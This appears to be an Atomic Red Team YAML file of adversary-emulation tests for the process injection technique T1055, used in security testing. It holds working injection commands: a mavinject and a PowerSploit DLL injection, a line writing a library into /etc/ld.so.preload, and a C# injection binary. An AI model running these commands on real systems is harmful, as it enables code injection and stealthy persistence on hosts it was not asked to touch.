Carrie Roberts
87 lines
2.3 KiB
YAML
87 lines
2.3 KiB
YAML
---
|
|
attack_technique: T1055
|
|
display_name: Process Injection
|
|
|
|
atomic_tests:
|
|
- name: Process Injection via mavinject.exe
|
|
description: |
|
|
Windows 10 Utility To Inject DLLS
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
dll_payload:
|
|
description: DLL to Inject
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll
|
|
process_id:
|
|
description: PID of input_arguments
|
|
type: Int
|
|
default: $pid
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
|
|
|
- name: Process Injection via PowerSploit
|
|
description: |
|
|
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
dll_payload:
|
|
description: DLL to Inject
|
|
type: Path
|
|
default: T1055.dll
|
|
process_id:
|
|
description: PID of input_arguments
|
|
type: Int
|
|
default: $pid
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
|
|
|
- name: Shared Library Injection via /etc/ld.so.preload
|
|
description: |
|
|
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
path_to_shared_library:
|
|
description: Path to a shared library object
|
|
type: Path
|
|
default: /tmp/evil_module.so
|
|
executor:
|
|
name: bash
|
|
command: |
|
|
echo #{path_to_shared_library} > /etc/ld.so.preload
|
|
- name: Process Injection via C#
|
|
description: |
|
|
Process Injection using C#
|
|
reference: https://github.com/pwndizzle/c-sharp-memory-injection
|
|
Excercises Five Techniques
|
|
1. Process injection
|
|
2. ApcInjectionAnyProcess
|
|
3. ApcInjectionNewProcess
|
|
4. IatInjection
|
|
5. ThreadHijack
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
exe_binary:
|
|
description: Output Binary
|
|
type: Path
|
|
default: T1055.exe
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
.\bin\#{exe_binary}
|